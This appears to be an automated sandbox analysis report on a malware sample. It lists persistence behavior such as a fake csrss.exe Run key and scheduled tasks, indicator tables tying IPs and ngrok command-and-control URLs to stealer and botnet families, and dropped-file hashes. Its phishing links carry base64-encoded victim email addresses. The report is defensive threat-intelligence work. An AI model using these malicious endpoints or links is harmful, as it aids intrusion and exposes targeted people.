• Excluded domains from analysis (whitelisted)
• Execution Graph export aborted for target FE8B.exe, PID 7100 because there are no executed functions
                                                                                                                                                                                                                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
12:12:00 | API Interceptor | 253361x Sleep call for process: explorer.exe modified
12:12:18 | Task Scheduler | Run new task: Firefox Default Browser Agent 643767907855D973 path: C:\Users\user\AppData\Roaming\rghwvve
12:12:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
12:12:31 | API Interceptor | 1x Sleep call for process: 93B.exe modified
12:12:38 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
12:12:39 | API Interceptor | 22x Sleep call for process: powershell.exe modified
12:12:43 | API Interceptor | 6x Sleep call for process: 288c47bbc1871b439df19ff4df68f076.exe modified
12:12:44 | API Interceptor | 1x Sleep call for process: FourthX.exe modified
12:12:44 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
12:12:45 | Task Scheduler | Run new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
12:13:11 | API Interceptor | 3484x Sleep call for process: vbsmartcardviewer.exe modified
12:13:11 | API Interceptor | 1471x Sleep call for process: 572.exe modified
12:13:19 | API Interceptor | 8765x Sleep call for process: csrss.exe modified
12:16:05 | API Interceptor | 1x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.134.125.175 | CdTyxgQzLV.exe | malicious | RedLine
• 0.tcp.ngrok.io:10680/
 | Xo79piwWtL.exe | malicious | RedLine
• 0.tcp.ngrok.io:13447/
 | Qfn5i16ago.exe | malicious | RedLine
• 0.tcp.ngrok.io:15384/
 | 5E9B8DB3AF808A6B409DD2283D3B44A7E88FA70B0D6DE.exe | malicious | Lokibot
• 6c21-95-156-231-11.ngrok.io/gentle/fre.php
 | Goodwill Encryptor.exe | malicious | Unknown
• 9855-13-235-50-147.ngrok.io/alertmsg.zip
 | Goodwill Encryptor.exe | malicious | Unknown
• 9855-13-235-50-147.ngrok.io/alertmsg.zip
 | calc.docx | malicious | Unknown
• 816e-182-227-90-53.ngrok.io/
 | RnT6mMyI7d.exe | malicious | Hog Grabber ItroublveBOT Stealer Xmrig
• 6ce0-2001-1bb0-e000-1e-00-c3c.ngrok.io/SHA256SUMS
 | PO specification dt.18-11-21.png.exe | malicious | RedLine
• 0.tcp.ngrok.io:10655/
172.66.43.168 | https://campaign-statistics.com/link_click/Nz2GgwBSQV_LUqIa/ddad3a69108cbcf4c600149122902d14#bHluZWxsZS5iZW5hbGxpZUBiaWEuZ292 | malicious | HTMLPhisher
 | https://campaign-statistics.com/link_click/Nz2GgwBSQV_LUqIa/ddad3a69108cbcf4c600149122902d14#Y2FybG9zX3Bvc2FkYUBnZW5zbGVyLmNvbQ== | malicious | HTMLPhisher
 | https://campaign-statistics.com/link_click/JLtaSbWx5D_GODxE/ccdd107767553aaaae6527ab9c7fc3a9 | malicious | Unknown
 | https://campaign-statistics.com/link_click/J100ujrtx3_FkbHU/3864b07f40d2892f7ae73f0ab1c18053 | malicious | Unknown
77.88.21.249 | jSlv5GLHad.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
 | SsQblB4e3Y.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
 | v6SEx6rJ3E.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, Vidar
 | tFGPgPkxgo.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
 | file.exe | malicious | Glupteba, Petite Virus, SmokeLoader, Socks5Systemz, Stealc
 | SSmamWOS7L.exe | malicious | Glupteba, SmokeLoader, Stealc
 | B843BuO7i3.exe | malicious | Glupteba, RedLine, SmokeLoader
 | file.exe | malicious | RedLine, SmokeLoader
 | IDzTyPghZg.exe | malicious | Unknown
 | gEkl9O5tiu.exe | malicious | Phorpiex
                                                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                • 172.67.207.116
                                                                                                                                                                                                                                                                                                                                Purchase___Inquiry_Rechnung_0103737.scr.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                                                                                                                                                                                                                • 172.67.147.32
                                                                                                                                                                                                                                                                                                                                zbnq9rGNLi.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.94.2
                                                                                                                                                                                                                                                                                                                                5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.94.2
                                                                                                                                                                                                                                                                                                                                AzionTechnologiesLtdaBRKb3RZ8k5pZ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.172.151
                                                                                                                                                                                                                                                                                                                                http://halffreesk.liveGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.182.65
                                                                                                                                                                                                                                                                                                                                https://asset.cloudinary.com/dl2sxs8iz/04a4ab663d302b47dc805a9afb10296aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.182.65
                                                                                                                                                                                                                                                                                                                                https://emailmarketing.locaweb.com.br/accounts/186093/messages/4/clicks/42702/5?envelope_id=2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.165.65
                                                                                                                                                                                                                                                                                                                                kgov12lNDR.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.172.111
                                                                                                                                                                                                                                                                                                                                AZMuJBHzLe.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.172.116
                                                                                                                                                                                                                                                                                                                                ptBUBZV1uOGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 179.191.172.132
                                                                                                                                                                                                                                                                                                                                PRODEPA-EmpTecdaInfeComdoEstadodoParaBR3NlKDxmZwm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                • 177.74.0.136
                                                                                                                                                                                                                                                                                                                                jklarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 177.74.22.250
                                                                                                                                                                                                                                                                                                                                veh795LK24.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                                                                                                                                                                                                • 177.74.16.92
                                                                                                                                                                                                                                                                                                                                XQxNgY2G12Get hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 177.74.0.122
                                                                                                                                                                                                                                                                                                                                phantom.armGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                • 177.74.0.124
                                                                                                                                                                                                                                                                                                                                CLOUDFLARENETUSrNUBzMB8Cm.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 172.67.139.220
                                                                                                                                                                                                                                                                                                                                https://1drv.ms/b/s!AqZOxKSu-d3ihb4-54i24ztV6tqQCQ?e=hxqCGgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                                                                                https://support.cch.com/productsupport/outsideLink.aspx?u=http%3A%2F%2Fdom.college/jyQ3EQ3ElQ3Esl-Q-4GQ3ErkQ3ElQ3Ey4RAnsuran8KvQ3EgrouP1--d58Kvo-d5ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                                                                                ORDER#20240129.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                                • 172.67.177.134
                                                                                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                                                • 172.67.138.44
                                                                                                                                                                                                                                                                                                                                Statenment_of_Account_#4576300.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                • 172.67.207.116
                                                                                                                                                                                                                                                                                                                                Purchase___Inquiry_Rechnung_0103737.scr.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                                                                                                                                                                                                                • 172.67.147.32
                                                                                                                                                                                                                                                                                                                                zbnq9rGNLi.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.94.2
                                                                                                                                                                                                                                                                                                                                5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.94.2
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1rNUBzMB8Cm.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.16.152
                                                                                                                                                                                                                                                                                                                                • 104.21.83.220
                                                                                                                                                                                                                                                                                                                                • 172.67.152.52
                                                                                                                                                                                                                                                                                                                                • 172.67.217.100
                                                                                                                                                                                                                                                                                                                                • 172.67.199.120
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.16.152
                                                                                                                                                                                                                                                                                                                                • 104.21.83.220
                                                                                                                                                                                                                                                                                                                                • 172.67.152.52
                                                                                                                                                                                                                                                                                                                                • 172.67.217.100
                                                                                                                                                                                                                                                                                                                                • 172.67.199.120
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.16.152
                                                                                                                                                                                                                                                                                                                                • 104.21.83.220
                                                                                                                                                                                                                                                                                                                                • 172.67.152.52
                                                                                                                                                                                                                                                                                                                                • 172.67.217.100
                                                                                                                                                                                                                                                                                                                                • 172.67.199.120
                                                                                                                                                                                                                                                                                                                                zbnq9rGNLi.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 104.21.16.152
                                                                                                                                                                                                                                                                                                                                • 104.21.83.220
                                                                                                                                                                                                                                                                                                                                • 172.67.152.52
                                                                                                                                                                                                                                                                                                                                • 172.67.217.100
                                                                                                                                                                                                                                                                                                                                • 172.67.199.120
                                                                                                                                                                                                                                                                                                                                5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
e5eFd2bt37.exe | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc
file.exe | malicious | RisePro Stealer
Gwrx3K7sz8.exe | malicious | Amadey, SmokeLoader
purchaseorder.bat | malicious | AveMaria, DBatLoader, UACMe
TOcuLeqhj0.exe | malicious | RisePro Stealer
523e76adb7aac8f6a8b2bf1f35d85d1f | DzVuoFusnL.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc
                                                                                                                                                                                                                                                                                                                                • 20.192.98.160
                                                                                                                                                                                                                                                                                                                                • 170.114.52.2
                                                                                                                                                                                                                                                                                                                                • 172.67.184.59
                                                                                                                                                                                                                                                                                                                                • 192.185.5.23
                                                                                                                                                                                                                                                                                                                                • 45.60.0.44
                                                                                                                                                                                                                                                                                                                                • 172.67.148.124
                                                                                                                                                                                                                                                                                                                                • 104.21.5.25
                                                                                                                                                                                                                                                                                                                                • 185.51.191.48
                                                                                                                                                                                                                                                                                                                                • 31.13.65.7
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
SSmamWOS7L.exe: malicious (Glupteba, SmokeLoader, Stealc)
                                                                                                                                                                                                                                                                                                                                • 172.67.184.59
                                                                                                                                                                                                                                                                                                                                • 192.185.5.23
                                                                                                                                                                                                                                                                                                                                • 45.60.0.44
                                                                                                                                                                                                                                                                                                                                • 172.67.148.124
                                                                                                                                                                                                                                                                                                                                • 104.21.5.25
                                                                                                                                                                                                                                                                                                                                • 185.51.191.48
                                                                                                                                                                                                                                                                                                                                • 31.13.65.7
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
aif31Spjyi.exe (malicious; Glupteba, SmokeLoader)
                                                                                                                                                                                                                                                                                                                                • 45.60.0.44
                                                                                                                                                                                                                                                                                                                                • 172.67.148.124
                                                                                                                                                                                                                                                                                                                                • 104.21.5.25
                                                                                                                                                                                                                                                                                                                                • 185.51.191.48
                                                                                                                                                                                                                                                                                                                                • 31.13.65.7
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
sCzFNAYGKI.exe (malicious): Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader
                                                                                                                                                                                                                                                                                                                                • 104.21.5.25
                                                                                                                                                                                                                                                                                                                                • 185.51.191.48
                                                                                                                                                                                                                                                                                                                                • 31.13.65.7
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
file.exe (malicious): Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader
                                                                                                                                                                                                                                                                                                                                • 31.13.65.7
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
ZRgv8wdMtR.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
82YWwkVfIS.exe, malicious: Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
BRvptajioG.exe: malicious (RedLine, SmokeLoader, Stealc)
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
file.exe (malicious; RedLine, SmokeLoader)
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
Ma0hVedIX4.exe: malicious (RedLine, SmokeLoader)
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
83d60721ecc423892660e275acc4dffd | zbnq9rGNLi.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse | 85.215.196.116
 | 5Yzloz244r.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse | 85.215.196.116
 | e5eFd2bt37.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse | 85.215.196.116
 | nxMV6rcvii.exe | Get hash | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 85.215.196.116
 | DzVuoFusnL.exe | Get hash | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc | Browse | 85.215.196.116
 | 38gmTjpc3Y.exe | Get hash | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc | Browse | 85.215.196.116
 | file.exe | Get hash | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader | Browse | 85.215.196.116
 | file.exe | Get hash | malicious | Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc | Browse | 85.215.196.116
 | Gcn7BdFE9N.exe | Get hash | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc | Browse | 85.215.196.116
 | file.exe | Get hash | malicious | Glupteba, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 85.215.196.116

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe | zbnq9rGNLi.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
 | 5Yzloz244r.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
 | e5eFd2bt37.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
C:\ProgramData\freebl3.dll | rNUBzMB8Cm.exe | Get hash | malicious | Clipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, Stealc | Browse |
 | uvEXXJGeMd.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | 0Rajeau4sd.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | epQiTcNFEp.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | 5Yzloz244r.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
 | e5eFd2bt37.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
 | OPnywcBrh6.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | 3vEtFxRJ9c.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | 1fXeff6C8A.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | hqsQzin1r6.exe | Get hash | malicious | Stealc, Vidar | Browse |
C:\ProgramData\Drivers\csrss.exe | zbnq9rGNLi.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
 | 5Yzloz244r.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |
 | e5eFd2bt37.exe | Get hash | malicious | LummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, Stealc | Browse |

Process: C:\Users\user\AppData\Local\Temp\nsx5151.tmp
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\nsx5151.tmp
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8508558324143882
Encrypted: false
SSDEEP: 24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5: 933D6D14518371B212F36C3835794D75
SHA1: 92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256: 55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512: EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\nsx5151.tmp
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.700739677288544
Encrypted: false
SSDEEP: 24:ppydEKvTSBiqFHi8v+wyNV+fxloGJjN3y5j1xTEC3ugbIvso8wFjas:rmEKvMiYC8Wwyr88GFAH/UvsuZl
                                                                                                                                                                                                                                                                                                                                                                MD5:57582F5B6AE65D8DFCBD4A26382C6138
                                                                                                                                                                                                                                                                                                                                                                SHA1:DC27AD5E54D1BDCCA4EC0D54ED1FB5A3235E9842
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7918D6E76741E42934BB32547E2D7EA395304AEA3383C0E6B7FCF82ACE125749
                                                                                                                                                                                                                                                                                                                                                                SHA-512:6D75F68E608CB12378605F06C74F2F0414486072CC25961A1EA421B94EA5827F92110B902C2190E04AAE2D79152B0AB9B5B1ACECDCAAADD93A6F25028DD1E060
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
